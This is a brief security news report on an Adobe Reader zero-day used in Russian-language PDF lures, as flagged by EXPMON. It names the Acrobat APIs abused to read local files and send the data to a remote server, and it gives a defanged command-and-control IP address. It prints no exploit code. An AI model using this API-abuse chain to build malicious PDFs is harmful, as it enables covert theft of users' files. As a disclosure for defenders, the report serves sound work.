ACCORDING to EXPMON, hackers used an Adobe Reader zero-day for months to deliver a sophisticated PDF exploit, with a suspicious file submitted to EXPMON on 26 March and flagged by its detection in depth, despite antivirus detection at 13/64 on VirusTotal. The sample abuses an unpatched Adobe Reader flaw to run privileged Acrobat APIs and uses util[.]readFileIntoStream() to read local files, then calls RSS[.]addFeed() to send stolen data to a remote server and receive more malicious JavaScript.
A researcher who goes online with the moniker Gi7w0rm reported that documents in the campaign contain Russian language lures and refer to issues related to current events in the oil and gas industry in Russia. On 8 April 2025, a new variant that connects to the IP address 188.214.34[.]20:34123 was observed, and the sample appeared on VirusTotal on 28 November 2025, indicating the hacking campaign has been ongoing for at least four months.
The analysis notes that the sample acts as an initial exploit capable of collecting information and potentially followed by remote code execution or sandbox escape if conditions are met.